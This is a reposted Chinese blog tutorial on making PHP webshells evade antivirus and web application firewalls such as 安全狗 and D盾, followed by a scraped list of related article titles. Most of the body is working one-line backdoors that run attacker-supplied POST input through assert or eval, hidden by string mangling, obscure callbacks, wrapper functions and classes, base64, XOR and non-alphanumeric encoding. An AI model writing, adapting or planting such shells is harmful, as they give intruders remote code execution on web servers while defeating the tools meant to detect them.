转自圈子404师傅

0x01 前言#

尽最大努力在一文中让大家掌握一些有用的WEBSHELL免杀技巧

0x02 目录#

  1. 关于eval 于 assert
  2. 字符串变形
  3. 定义函数绕过
  4. 回调函数
  5. 回调函数变形
  6. 特殊字符干扰
  7. 数组
  9. 编码绕过
  10. 无字符特征马
  11. PHP7.1后webshell何去何从
  12. 总结

0x03 关于eval 于 assert#

关于eval函数在php给出的官方说明是

eval 是一个语言构造器而不是一个函数,不能被 可变函数 调用
可变函数:通过一个变量,获取其对应的变量值,然后通过给该值增加一个括号(),让系统认为该值是一个函数,从而当做函数来执行
通俗的说比如你 <?php $a=eval;$a() ?> 这样是不行的 也造就了用eval的话达不到assert的灵活,但是在php7.1以上assert已经不行

关于assert函数

assert() 回调函数在构建自动测试套件的时候尤其有用,因为它们允许你简易地捕获传入断言的代码,并包含断言的位置信息。 当信息能够被其他方法捕获,使用断言可以让它更快更方便!

0x04 字符串变形#

字符串变形多数用于BYPASS安全狗,相当对于D盾,安全狗更加重视"形"
一个特殊的变形就能绕过安全狗,看看PHP手册,有着很多关于操作字符串的函数

ucwords() //函数把字符串中每个单词的首字符转换为大写。ucfirst() //函数把字符串中的首字符转换为大写。trim() //函数从字符串的两端删除空白字符和其他预定义字符。substr_replace() //函数把字符串的一部分替换为另一个字符串substr() //函数返回字符串的一部分。strtr() //函数转换字符串中特定的字符。strtoupper() //函数把字符串转换为大写。strtolower() //函数把字符串转换为小写。strtok() //函数把字符串分割为更小的字符串str_rot13() //函数对字符串执行 ROT13 编码。

由于PHP的灵活性操作字符串的函数很多,我这里就不一一列举了

substr_replace() 函数变形assert 达到免杀的效果

<?php $a = substr_replace("assexx","rt",4);$a($_POST['x']);?>

其他函数类似 不一一列举了

0x05 定义函数绕过#

定义一个函数把关键词分割达到bypass效果

<?php function kdog($a){    $a($_POST['x']);}kdog(assert);?>

反之

<?php function kdog($a){    assert($a);}kdog($_POST[x]);?>

效果一样,这种绕过方法,对安全狗还是比较有效的 在d盾面前就显得小儿科了 ,不过后面会讲到如何用定义函数的方法来 绕过d盾

0x05 回调函数#

call_user_func_array()call_user_func()array_filter() array_walk()  array_map()registregister_shutdown_function()register_tick_function()filter_var() filter_var_array() uasort() uksort() array_reduce()array_walk() array_walk_recursive()

回调函数大部分已经被安全软件加入全家桶套餐 所以找到一个生僻的不常用的回调函数来执行 比如

<?php forward_static_call_array(assert,array($_POST[x]));?>

这个函数能过狗,但是D盾显示是一级

0x05 回调函数变形#

前面说过众多回调函数已经被加入豪华套餐了,怎么绕过呢,其实也很简单 那就是定义个函数 或者类来调用

定义一个函数

<?php function test($a,$b){    array_map($a,$b);}test(assert,array($_POST['x']));?>

定义一个类

<?php class loveme {    var $a;    var $b;    function __construct($a,$b) {        $this->a=$a;        $this->b=$b;    }    function test() {       array_map($this->a,$this->b);    }}$p1=new loveme(assert,array($_POST['x']));$p1->test();?>

0x06 特殊字符干扰#

特殊字符干扰,要求是能干扰到杀软的正则判断,还要代码能执行,网上广为流传的连接符

初代版本

<?php $a = $_REQUEST['a'];$b = null;eval($b.$a);?>

不过已经不能免杀了,利用适当的变形即可免杀 如

<?php $a = $_POST['a'];$b = "\n";eval($b.=$a);?>

其他方法大家尽情发挥如"\r\n\t",函数返回,类,等等

除了连接符号 还有个命名空间的东西 \ 具体大家可以看看php手册

<?php function dog($a){\assert($a);}dog($_POST[x]);?>

当然还有其他的符号熟读PHP手册就会有不一样的发现

0x07 数组#

把执行代码放入数组中执行绕过

<?php $a = substr_replace("assexx","rt",4);$b=[''=>$a($_POST['q'])];?>

多维数组

<?php $b = substr_replace("assexx","rt",4);$a = array($arrayName = array('a' => $b($_POST['q'])));?>

0x08 类#

说到类肯定要搭配上魔术方法比如 __destruct()__construct()
直接上代码

<?php class me{  public $a = '';  function __destruct(){    assert("$this->a");  }}$b = new me;$b->a = $_POST['x'];?>

用类把函数包裹,D盾对类查杀较弱

0x09 编码绕过#

用php的编码函数,或者用异或等等
简单的base64_decode,其中因为他的正则匹配可以加入一些下划线干扰杀软

<?php $a = base64_decode("YXNz+ZX____J____0");$a($_POST[x]);?>

异或

<?php $a= ("!"^"@").'ssert';$a($_POST[x]);?>

0x9 无字符特征马#

对于无特征马这里我的意思是 无字符特征

  1. 利用异或,编码等方式 例如p神博客的
<?php $_=('%01'^'`').('%13'^'`').('%13'^'`').('%05'^'`').('%12'^'`').('%14'^'`');  //$_='assert';$__='_'.('%0D'^']').('%2F'^'`').('%0E'^']').('%09'^']');   //$__='_POST';$___=$$__;$_($___[_]);  //assert($_POST[_]);?>

  1. 利用正则匹配字符 如Tab等  然后转换为字符

  2. 利用POST包获取关键参数执行 例如
<?php $decrpt = $_POST['x'];$arrs = explode("|", $decrpt)[1];$arrs = explode("|", base64_decode($arrs));call_user_func($arrs[0],$arrs[1]);?>

0x10 PHP7.1后webshell何去何从#

在php7.1后面我们已经不能使用强大的assert函数了用eval将更加注重特殊的调用方法和一些字符干扰,后期大家可能更加倾向使用大马

总结#

对于安全狗杀形,d盾杀参的思路来绕过。生僻的回调函数,特殊的加密方式,以及关键词的后传入都是不错的选择。
对于关键词的后传入对免杀安全狗,d盾,河马 等等都是不错的,后期对于菜刀的轮子,也要走向高度的自定义化
用户可以对传出的post数据进行自定义脚本加密,再由webshell进行解密获取参数,那么以现在的软WAF查杀能力
几乎为0,安全软件也需要与时俱进了。

转载于:https://www.cnblogs.com/-qing-/p/10631414.html

Webshell免杀绕过waf相关推荐

  1. sqlmap绕过d盾_WEBSHELL免杀绕过WAF思路amp;方法(一)

    本文主要介绍WEBSHELL免杀绕过的思路与方法,网上很多的方法基本都被安全厂家加入了检测规则已经不能免杀,所以我们要了解我们主要对手WAF的检测技术,故基于前人优秀基础上我们需要有能力衍生出免杀马, ...

  2. webshell免杀的一些学习和思考——以PHP为例

    目录 前言 一.关于webshell 1.数据传递 (1)HTTP请求中获取数据 (2)从远程URL中获取数据 (3)从磁盘文件中获取数据 (4)从数据库中读取 (5)从图片头部中获取 2.代码执行 ...

  3. 简单免杀绕过和利用上线的 GoCS

    前言: Goby 可以快速准确的扫描资产,并直观呈现出来.同时经过上次 EXP 计划过后,PoC&EXP 也增加了许多.在实战化漏洞扫描后,对于高危漏洞的利用,不仅仅只在 whoami 上,而 ...

  4. 插件分享 | 简单免杀绕过和利用上线的 GoCS

    前言: Goby 可以快速准确的扫描资产,并直观呈现出来.同时经过上次 EXP 计划过后,PoC&EXP 也增加了许多.在实战化漏洞扫描后,对于高危漏洞的利用,不仅仅只在 whoami 上,而 ...

  5. php webshell原理,php webshell分析和绕过waf原理解析

    本文讲述的是php webshell分析和绕过waf的原理解析,旨在服务社会,供安全研究人员学习使用,请勿用于其他非法用途,违者后果自负.WebShell是攻击者使用的恶意脚本,它的用途主要是在攻击后 ...

  6. Webshell免杀研究

    前一个阶段闲着没事干,所以将之前做的关于webshell免杀的一篇研究性文章发表了出来,供大家一起学习探讨,文章目录如下,目前已发表与先知社区,欢迎探讨交流~ 文章链接:https://xz.aliy ...

  7. WebShell 木马免杀过WAF

    就算木马能正常运行,那么过段时间会不会被管理员杀掉?如何免杀?上面虽然木马上传成功了,但是只要管理员一杀毒,全部都能杀出来.而且,还会很明确的说这是后门.因此,作为攻击者就得会各种免杀技巧. 防御者的 ...

  8. 【网络安全】一些webshell免杀的技巧

    前言 由于杀软的规则在不断更新 所以很多之前的过杀软方法基本上都不行了 而且随着php7逐渐扩张 assert马也将被淘汰 所以本文将提出几种免杀思路 效果很好 而且不会被杀软的正则和沙盒规则约束. ...

  9. 免杀实战之面向PHP的WebShell免杀

    0X00普通的一句话木马 <pre id="PTXkG"><?php eval($_POST['a']); ?> //函数的相似替换 <?php as ...

最新文章

  1. 2014.12.01 B/S之windows8.1下安装IIS
  2. Lua(Codea) 中 table.insert 越界错误原因分析
  3. spark常用函数比较
  4. 手机电脑的芯片主要是由_苹果的自研电脑芯片终于来了!你看好么?
  5. FloatingActionButton完美显示
  6. 四六级php,详解四六级查询API+网页
  7. ios中解决图片渲染问题
  8. 谈谈linux系统调用
  9. 计算机系统启动的加点顺序是,操作系统引导探究
  10. 菜鸟的MySQL学习笔记(一)
  11. 让你每天精神都好好的方法ZT 1
  12. 洛谷——P1482 Cantor表(升级版)
  13. 随机游走问题的神奇应用(二)
  14. LeetCode—Python版数组简单题(二)
  15. mac如何查看ssd寿命_固态硬盘ssd写入量剩余读写次数怎么查
  16. 怎么看rx580是不是470刷的_【BIOS】网上都没有的教程 RX470 RX480 RX570 RX580显卡BIOS刷黑了怎么办?自救方法...
  17. STM32硬件编程_学习思路
  18. 无法在linux下启用ttysac0串口 终端只打印信息,启动出现mmc0: error -110 whilst initialising SD card该如何解决?...
  19. DDOS 攻击的防范教程
  20. 金山办公2020笔试

热门文章

  1. bash-shell详解
  2. “Survey of machine learning techniques for malware analysis ”
  3. Resource stopwords not found. Please use the NLTK Downloader to obtain the r
  4. python——模块
  5. 故障解决:没有未桥接的主机网络适配器
  6. 日常生活小技巧 --惠普战66三代 重装系统
  7. S5PV210开发 -- 烧写/启动模式
  8. linux mount挂载设备(u盘,光盘,iso等 )使用说明
  9. Android系统启动-zygote篇
  10. Android-实现View滑动的6种方式